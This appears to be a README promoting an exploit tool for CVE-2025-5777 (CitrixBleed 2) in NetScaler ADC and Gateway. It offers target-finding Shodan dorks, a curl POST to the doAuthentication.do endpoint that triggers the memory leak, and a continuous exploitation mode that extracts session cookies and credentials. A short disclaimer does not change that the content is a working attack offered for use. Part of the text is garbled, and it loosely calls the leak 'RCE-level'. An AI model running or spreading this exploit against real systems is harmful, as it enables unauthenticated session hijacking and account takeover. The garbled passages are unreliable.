
An advanced, powerful, and easy-to-use tool designed to detect and exploit CVE-2025-5777 (CitrixBleed 2). This script not only identifies the vulnerability but also helps in demonstrating its impact by parsing human-readable information from the memory leak.

CVE-2025-5777Virendra Kumar & CyberLeelawatAn advanced, powerful, and easy-to-use tool designed to detect and exploit CVE-2025-5777 (aka CitrixBleed 2).
This script not only identifies the memory leak vulnerability but demonstrates real-world impact by parsing sensitive data like session cookies and credentials directly from leaked memory.
CVE-2025-5777 is a critical memory leak vulnerability in NetScaler (Citrix) ADC and Gateway products.
🧨 It allows unauthenticated, remote attackers to leak sensitive memory content like:
NSC_AAAC)This can result in full account takeover without credentials or MFA, making it a high-impact RCE-level vulnerability.
✅ High-Speed Asynchronous Scanning
→ Built with asyncio & aiohttp to scan targets blazing fast.
✅ Intelligent Data Extraction
→ Parses human-readable strings from leaked memory (like creds, tokens).
✅ Sensitive Data Detection
→ Detects critical patterns like session cookies and flags high-risk data.
✅ Leak Reporting
→ Automatically stores leaks into leaks.txt for clean offline analysis.
✅ PoC + Exploitation Loop
→ Supports one-time check or continuous exploitation mode with --check flag.
❗ This tool is for educational and authorized bug bounty testing only.
❌ Unauthorized use on systems you don’t own or have permission to test is illegal.
🧑💻 The author is not responsible for any misuse or damage caused by this tool.
http.html:"_ctxstxt_NetscalerAAA" ssl.cert.subject.CN:"target.com" port:6443
title:"Netscaler Gateway" ssl.cert.subject.CN:"target.com" port:6443
title:"NetScaler AAA" ssl.cert.subject.CN:"target.com" port:6443
http.favicon.hash:-1166125415 ssl.cert.subject.CN:"target.com" port:6443
http.favicon.hash:-1292923998 ssl.cert.subject.CN:"target.com" port:6443
curl -s -k -X POST "https://target.com/p/u/doAuthentication.do" -d "login"
Exploit Payload Path
https://target.com/p/u/doAuthentication.do
Use Burp Suite to capture and manipulate the request.
📜 License This project is licensed under the MIT License – see the LICENSE file for details.